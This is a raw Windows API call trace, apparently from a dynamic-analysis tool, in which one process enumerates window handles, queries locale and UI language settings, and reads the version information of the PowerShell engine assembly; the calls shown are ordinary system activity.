	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.952] GetLastError () returned 0x0
	[0058.952] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.953] GetLastError () returned 0x0
	[0058.953] GetWindowThreadProcessId (in: hWnd=0x30278, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xfb0
	[0058.953] GetLastError () returned 0x0
	[0058.953] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.953] GetLastError () returned 0x0
	[0058.953] GetWindowThreadProcessId (in: hWnd=0x300aa, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.953] GetLastError () returned 0x0
	[0058.953] GetWindowThreadProcessId (in: hWnd=0x30098, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.953] GetLastError () returned 0x0
	[0058.953] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.953] GetLastError () returned 0x0
	[0058.953] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.953] GetLastError () returned 0x0
	[0058.953] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.953] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x200d4, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcd0
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xccc
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcc8
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x200fa, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x200f8, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x201ea, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.954] GetLastError () returned 0x0
	[0058.954] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc98
	[0058.954] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb74
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb64
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb54
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb44
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb34
	[0058.955] GetLastError () returned 0x0
	[0058.955] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb24
	[0058.955] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb14
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x20176, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb04
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xaf4
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xae4
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xad4
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xac4
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xab0
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xaa0
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x700ec, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xa7c
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x89c
	[0058.956] GetLastError () returned 0x0
	[0058.956] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8b0
	[0058.956] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8a4
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x20134, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8b0
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8a4
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8b0
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x89c
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x89c
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x5b4
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x7c0
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x50086, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.957] GetLastError () returned 0x0
	[0058.957] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x234
	[0058.957] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x450
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x20030, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x450
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x30034, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x450
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x758
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x10036, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x594
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x30026, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x56c
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x73c
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x2002e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x508
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x450
	[0058.958] GetLastError () returned 0x0
	[0058.958] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8f0
	[0058.958] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x47c
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x30270, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xff4
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x6004e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xf00
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x2027e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xe14
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcac
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xc3c
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x30276, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xfb0
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcd0
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xccc
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xcc8
	[0058.959] GetLastError () returned 0x0
	[0058.959] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb74
	[0058.959] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb64
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb54
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb44
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb34
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb24
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb14
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xb04
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xaf4
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xae4
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xad4
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xac4
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xab0
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xaa0
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0xa7c
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8a4
	[0058.960] GetLastError () returned 0x0
	[0058.960] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x8b0
	[0058.960] GetLastError () returned 0x0
	[0058.961] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x89c
	[0058.961] GetLastError () returned 0x0
	[0058.961] GetWindowThreadProcessId (in: hWnd=0x10046, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x758
	[0058.961] GetLastError () returned 0x0
	[0058.961] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x594
	[0058.961] GetLastError () returned 0x0
	[0058.961] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x56c
	[0058.961] GetLastError () returned 0x0
	[0058.961] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x73c
	[0058.961] GetLastError () returned 0x0
	[0058.961] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x450
	[0058.961] GetLastError () returned 0x0
	[0058.961] GetWindowThreadProcessId (in: hWnd=0x20032, lpdwProcessId=0xae830 | out: lpdwProcessId=0xae830) returned 0x450
	[0058.961] GetLastError () returned 0x0
	[0058.961] GetLastError () returned 0x0
	[0058.962] WerSetFlags () returned 0x0
	[0058.967] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0058.969] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xaec0c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xaec08 | out: pulNumLanguages=0xaec0c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xaec08) returned 1
	[0058.969] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xaec0c, pwszLanguagesBuffer=0x1e8e4cc, pcchLanguagesBuffer=0xaec08 | out: pulNumLanguages=0xaec0c, pwszLanguagesBuffer=0x1e8e4cc, pcchLanguagesBuffer=0xaec08) returned 1
	[0058.971] GetUserDefaultLocaleName (in: lpLocaleName=0x242ad0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0059.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.036] GetLastError () returned 0xcb
	[0059.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.039] GetLastError () returned 0xcb
	[0059.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x242ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0059.041] GetLastError () returned 0xcb
	[0059.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae67c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0059.050] GetLastError () returned 0xcb
	[0059.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0059.050] GetLastError () returned 0xcb
	[0059.050] SetErrorMode (uMode=0x1) returned 0x1
	[0059.051] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xaeb18 | out: lpFileInformation=0xaeb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0059.051] GetLastError () returned 0xcb
	[0059.051] SetErrorMode (uMode=0x1) returned 0x1
	[0059.051] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xaeb9c | out: lpdwHandle=0xaeb9c) returned 0x94c
	[0059.053] GetLastError () returned 0x0
	[0059.053] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1e909fc | out: lpData=0x1e909fc) returned 1
	[0059.054] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaeb68, puLen=0xaeb64 | out: lplpBuffer=0xaeb68*=0x1e90a98, puLen=0xaeb64) returned 1
	[0059.054] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90b74, puLen=0xaeae0) returned 1
	[0059.054] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0059.055] lstrcpyW (in: lpString1=0x242ad0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0059.055] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90bc8, puLen=0xaeae0) returned 1
	[0059.055] lstrlenW (lpString="System.Management.Automation") returned 28
	[0059.055] lstrcpyW (in: lpString1=0x242ad0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0059.055] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90c24, puLen=0xaeae0) returned 1
	[0059.055] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0059.055] lstrcpyW (in: lpString1=0x242ad0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0059.055] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90c64, puLen=0xaeae0) returned 1
	[0059.055] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0059.055] lstrcpyW (in: lpString1=0x242ad0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0059.055] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90ccc, puLen=0xaeae0) returned 1
	[0059.055] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0059.055] lstrcpyW (in: lpString1=0x242ad0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0059.055] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90d68, puLen=0xaeae0) returned 1
	[0059.055] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0059.055] lstrcpyW (in: lpString1=0x242ad0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0059.056] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90dcc, puLen=0xaeae0) returned 1
	[0059.056] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0059.056] lstrcpyW (in: lpString1=0x242ad0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0059.056] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90e48, puLen=0xaeae0) returned 1
	[0059.056] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0059.056] lstrcpyW (in: lpString1=0x242ad0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0059.056] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x1e90af0, puLen=0xaeae0) returned 1
	[0059.056] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0059.056] lstrcpyW (in: lpString1=0x242ad0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0059.057] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x0, puLen=0xaeae0) returned 0
	[0059.057] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x0, puLen=0xaeae0) returned 0
	[0059.057] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xaeae4, puLen=0xaeae0 | out: lplpBuffer=0xaeae4*=0x0, puLen=0xaeae0) returned 0
	[0059.057] VerQueryValueW (in: pBlock=0x1e909fc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xaead8, puLen=0xaead4 | out: lplpBuffer=0xaead8*=0x1e90a98, puLen=0xaead4) returned 1
	[0059.057] VerLanguageNameW (in: wLang=0x0, szLang=0x242ad0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
